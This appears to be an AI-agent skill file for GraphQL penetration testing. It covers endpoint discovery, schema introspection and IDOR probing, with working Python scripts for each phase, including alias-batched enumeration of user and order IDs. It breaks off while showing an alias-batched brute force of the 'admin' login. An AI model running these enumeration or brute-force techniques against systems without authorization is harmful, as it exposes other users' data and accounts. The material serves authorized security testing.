Install: claude install-skill sunilgentyala/OmniRed
# GraphQL Security Testing
## Attack Surface
GraphQL exposes a single endpoint behind a flexible query language, and the same issues recur in testing: unauthorized object access via ID manipulation in arguments (IDOR), schema disclosure via introspection, DoS via deeply nested or alias-batched queries, injection where resolvers pass arguments unparameterised into SQL/NoSQL/command calls, and information disclosure via verbose errors (stack traces, resolver paths, field suggestions).
## Methodology
### Phase 1 — Discover and fingerprint
```
Common endpoints: /graphql, /api/graphql, /query, /gql, /v1/graphql
Test with: POST {"query": "{ __typename }"} (a live endpoint answers {"data": {"__typename": "Query"}}, the name of the root query type); also try GET ?query={__typename}
Check for: GraphiQL / GraphQL Playground IDE served on the same path in production
```
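The discovery step as a script, added here as an example and not part of OmniRed: it probes the candidate paths listed above with `{ __typename }` over POST, fetches each path over GET to spot an exposed IDE, and classifies the answers. The probe query, the classification heuristics (`data.__typename`, a GraphQL-shaped `errors` array, "graphiql" in an HTML body) and the timeout are assumptions.

```python
"""Discover GraphQL endpoints and check for an exposed IDE.

Added example for Phase 1; it is not OmniRed's code. The candidate paths
are the ones listed above; the probe query, the classification heuristics
and the timeout are assumptions.
"""
import json
import urllib.error
import urllib.request

CANDIDATE_PATHS = ["/graphql", "/api/graphql", "/query", "/gql", "/v1/graphql"]
PROBE_QUERY = "{ __typename }"


def classify_response(content_type, body):
    """Classify one HTTP response to the probe.

    'graphql'  - JSON carrying data.__typename (live endpoint) or a GraphQL-style
                 errors array (live endpoint that rejected the probe)
    'graphiql' - HTML embedding the GraphiQL or GraphQL Playground IDE
    'other'    - anything else (404 page, unrelated JSON, non-JSON body)
    """
    text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
    if "text/html" in content_type.lower():
        low = text.lower()
        return "graphiql" if ("graphiql" in low or "graphql playground" in low) else "other"
    try:
        doc = json.loads(text)
    except ValueError:
        return "other"
    if not isinstance(doc, dict):
        return "other"
    data = doc.get("data")
    if isinstance(data, dict) and "__typename" in data:
        return "graphql"
    errors = doc.get("errors")
    if isinstance(errors, list) and errors and isinstance(errors[0], dict) and "message" in errors[0]:
        return "graphql"
    return "other"


def _fetch(req, timeout):
    """Return (content_type, body) even for 4xx/5xx, which often still carry a GraphQL error body."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.headers.get("Content-Type", ""), resp.read()
    except urllib.error.HTTPError as e:
        return e.headers.get("Content-Type", ""), e.read()
    except (urllib.error.URLError, OSError):
        return "", b""


def probe(base_url, paths=CANDIDATE_PATHS, timeout=5):
    """POST the probe as JSON (what servers expect) and GET the path (where an IDE page sits).

    Returns {url: sorted list of classifications} for paths that answered like GraphQL."""
    findings = {}
    for path in paths:
        url = base_url.rstrip("/") + path
        post = urllib.request.Request(
            url, data=json.dumps({"query": PROBE_QUERY}).encode(),
            headers={"Content-Type": "application/json"}, method="POST")
        get = urllib.request.Request(url, headers={"Accept": "text/html"}, method="GET")
        kinds = {classify_response(*_fetch(r, timeout)) for r in (post, get)}
        kinds.discard("other")
        if kinds:
            findings[url] = sorted(kinds)
    return findings


if __name__ == "__main__":
    import sys
    for url, kinds in probe(sys.argv[1]).items():
        print(url, ", ".join(kinds))
```

A 4xx response is deliberately still classified: many servers answer a malformed or unsupported probe with a 400 whose body is a GraphQL `errors` array, which confirms the endpoint just as well as a successful `__typename`.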
### Phase 2 — Introspection (schema extraction)
```graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      name
      kind
      fields {
        name
        # args are what you will manipulate in later phases; the nested ofType
        # chain is needed to unwrap NON_NULL/LIST wrappers such as [User!]!
        args { name type { name kind ofType { name kind ofType { name kind } } } }
        type { name kind ofType { name kind ofType { name kind } } }
      }
    }
  }
}
```
```
Extract all queries, mutations, subscriptions, types, field names and argument types. Build a complete map of the API surface. If introspection is disabled, the server's "Did you mean ...?" field suggestions in error messages still leak names one guess at a time; clairvoyance automates that recovery.
```bash
# Automated: InQL dumps the schema and generates example queries,
# graphql-voyager renders the dumped schema as a graph
inql -t http://target/graphql
```
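Mapping the surface from the raw introspection JSON, as an added example that is neither OmniRed's nor InQL's code: it unwraps `NON_NULL`/`LIST` type references back into SDL notation, lists every root operation with its argument types, lists the user-defined object types, and picks out operations that take an `ID` argument as the starting points for the IDOR checks in the next phase. The introspection response below is constructed (built with a small SDL-to-reference helper to keep it short), not captured from any target, and assumes the query above requested `args` and a three-deep `ofType` chain.

```python
"""Turn an introspection response into a map of the API surface.

Added example, not OmniRed's or InQL's code. It assumes the introspection
query requested `args` on fields and a deep enough `ofType` chain; the
sample response below is constructed, not captured from any target.
"""
import json

SCALARS = {"ID", "String", "Int", "Float", "Boolean"}


def sdl_to_ref(sdl):
    """Build an introspection type reference from SDL such as '[User!]!'.
    Used only to construct the sample compactly; real responses arrive as JSON."""
    if sdl.endswith("!"):
        return {"kind": "NON_NULL", "name": None, "ofType": sdl_to_ref(sdl[:-1])}
    if sdl.startswith("["):
        return {"kind": "LIST", "name": None, "ofType": sdl_to_ref(sdl[1:-1])}
    return {"kind": "SCALAR" if sdl in SCALARS else "OBJECT", "name": sdl, "ofType": None}


def _field(name, returns, **args):
    return {"name": name, "type": sdl_to_ref(returns),
            "args": [{"name": a, "type": sdl_to_ref(t)} for a, t in args.items()]}


# Constructed sample of what a server might return for the introspection query
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}, "subscriptionType": None,
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            _field("user", "User", id="ID!"),
            _field("users", "[User!]!", first="Int"),
            _field("order", "Order", id="ID!")]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            _field("login", "AuthPayload", username="String!", password="String!"),
            _field("deleteUser", "Boolean!", id="ID!")]},
        {"name": "User", "kind": "OBJECT", "fields": [
            _field("id", "ID!"), _field("email", "String"), _field("role", "String"),
            _field("balance", "Float")]},
        {"name": "Order", "kind": "OBJECT", "fields": [_field("id", "ID!"), _field("total", "Float")]},
        {"name": "AuthPayload", "kind": "OBJECT", "fields": [_field("token", "String")]},
        {"name": "__Schema", "kind": "OBJECT", "fields": []},   # introspection-internal, skipped below
        {"name": "String", "kind": "SCALAR", "fields": None},
    ]}}}


def ref_to_sdl(ref):
    """Render a type reference as SDL, walking NON_NULL ('!') and LIST ('[..]') wrappers."""
    if ref["kind"] == "NON_NULL":
        return ref_to_sdl(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + ref_to_sdl(ref["ofType"]) + "]"
    return ref["name"]


def map_surface(doc):
    """Return {rootType: {field: {'args': {name: sdl}, 'returns': sdl}}} for the defined roots."""
    schema = doc["data"]["__schema"]
    by_name = {t["name"]: t for t in schema["types"]}
    surface = {}
    for root in ("queryType", "mutationType", "subscriptionType"):
        ref = schema.get(root)
        if not ref:
            continue
        ops = {}
        for f in by_name[ref["name"]].get("fields") or []:
            ops[f["name"]] = {"args": {a["name"]: ref_to_sdl(a["type"]) for a in f.get("args") or []},
                              "returns": ref_to_sdl(f["type"])}
        surface[ref["name"]] = ops
    return surface


def object_fields(doc):
    """Return {type: {field: sdl}} for user-defined object types (skips __-prefixed introspection types)."""
    out = {}
    for t in doc["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        out[t["name"]] = {f["name"]: ref_to_sdl(f["type"]) for f in t.get("fields") or []}
    return out


def id_taking_operations(surface):
    """Operations with an ID-typed argument: the first candidates for Phase 3 IDOR checks."""
    return sorted(f"{root}.{name}" for root, ops in surface.items() for name, op in ops.items()
                  if any(sdl.rstrip("!") == "ID" for sdl in op["args"].values()))


def render(surface):
    """One line per operation, e.g. 'Query.user(id: ID!): User'."""
    return "\n".join(f"{root}.{name}({', '.join(f'{a}: {t}' for a, t in op['args'].items())}): {op['returns']}"
                     for root, ops in surface.items() for name, op in ops.items())


if __name__ == "__main__":
    import sys
    doc = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_INTROSPECTION
    print(render(map_surface(doc)))
    print("ID-taking operations:", id_taking_operations(map_surface(doc)))
```

Pass the saved introspection response as the first argument to run it against a real dump; the unwrapping in `ref_to_sdl` only works if the saved response contains enough `ofType` levels, which is why the query above nests three deep.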
### Phase 3 — IDOR via ID manipulation
```graphql
# Test integer IDs: fetch the object your session owns, then the adjacent ID
query { user(id: 1) { email, role, balance } }   # the tester's own user
query { user(id: 2) { email, role, balance } }   # another user's data: IDOR if returned
# Test UUIDs: they cannot be enumerated, so harvest them from other responses
# (list queries, relations, error messages) and replay them under your own session
query { order(id: "550e8400-e29b-41d4-a716-446655440000") { total, items } }
```
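Driving the ID checks at scale, as an added example that is not OmniRed's code: it builds one query with an aliased call per ID (the same alias batching Phase 4 turns against login), matches errors back to aliases through their `path`, and separates three outcomes that a single `user(id: N)` request blurs together: data returned, `null` with no error (object absent) and an explicit error (an authorization check fired). Only the first outcome for an ID the session does not own is an IDOR finding. The operation, argument and selection names and the sample response are constructed.

```python
"""Enumerate object IDs through alias-batched queries and triage the answers.

Added example for Phase 3; not OmniRed's code. Operation name, argument
name, selection set and the sample response are constructed; the alias
batching it uses is the same primitive Phase 4 applies to login.
"""
import json
import urllib.request


def gql_literal(value):
    """Render a Python value as a GraphQL literal: ints stay bare, strings get double quotes."""
    return json.dumps(value) if isinstance(value, str) else str(value)


def build_alias_batch(op, arg, values, selection):
    """One query with one aliased call per value, e.g.
    query { i1: user(id: 1) { email role } i2: user(id: 2) { email role } }"""
    calls = " ".join(f"i{n}: {op}({arg}: {gql_literal(v)}) {{ {selection} }}"
                     for n, v in enumerate(values, 1))
    return f"query {{ {calls} }}"


def triage(values, response):
    """Map each batched value to 'data', 'null' or 'error:<message>'.

    Errors are matched to aliases through their `path`. A null with no error
    usually means the object does not exist; an error usually means the
    resolver ran an authorization check. Both differ from 'data', which is
    the IDOR signal when the session does not own that ID."""
    data = response.get("data") or {}
    errors = {}
    for err in response.get("errors") or []:
        path = err.get("path") or []
        if path:
            errors[path[0]] = err.get("message", "")
    result = {}
    for n, v in enumerate(values, 1):
        alias = f"i{n}"
        if alias in errors:
            result[v] = "error:" + errors[alias]
        elif data.get(alias) is None:
            result[v] = "null"
        else:
            result[v] = "data"
    return result


def exposed_ids(triaged, own_ids):
    """IDs that returned data although the current principal does not own them."""
    return [v for v, status in triaged.items() if status == "data" and v not in own_ids]


def send(url, query, headers=None, timeout=10):
    """POST a query; headers carry the tester's own session so results reflect that principal."""
    req = urllib.request.Request(
        url, data=json.dumps({"query": query}).encode(),
        headers={"Content-Type": "application/json", **(headers or {})}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read())


def enumerate_ids(url, op, arg, values, selection, own_ids, headers=None, batch=100):
    """Walk `values` with `batch` aliases per request and collect the exposed IDs."""
    found = []
    for i in range(0, len(values), batch):
        chunk = values[i:i + batch]
        response = send(url, build_alias_batch(op, arg, chunk, selection), headers)
        found += exposed_ids(triage(chunk, response), own_ids)
    return found


# Constructed sample: what the server might answer for IDs 1..4 when the session owns user 1
SAMPLE_RESPONSE = {
    "data": {
        "i1": {"email": "me@example.com", "role": "user"},
        "i2": {"email": "other@example.com", "role": "admin"},  # another user's data: IDOR
        "i3": None,                                               # no such user
        "i4": None,
    },
    "errors": [{"message": "Not authorized", "path": ["i4"]}],   # authz check fired for id 4
}

if __name__ == "__main__":
    print(build_alias_batch("user", "id", [1, 2, 3, 4], "email role balance"))
    print(exposed_ids(triage([1, 2, 3, 4], SAMPLE_RESPONSE), own_ids={1}))
```

Run the same batch once more without the session header: objects that come back unauthenticated are a separate, more severe finding than objects readable across accounts. Keep the batch size below the server's query-complexity limit if one is configured, or the whole request is rejected and every ID in it reads as an error.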
### Phase 4 — Batching attacks (rate limit bypass, brute force)
```graphql
# Alias batching — send 100 requests in one HTTP call
query {
a1: login(username: "admin", password: "password1") { token }
a2: logi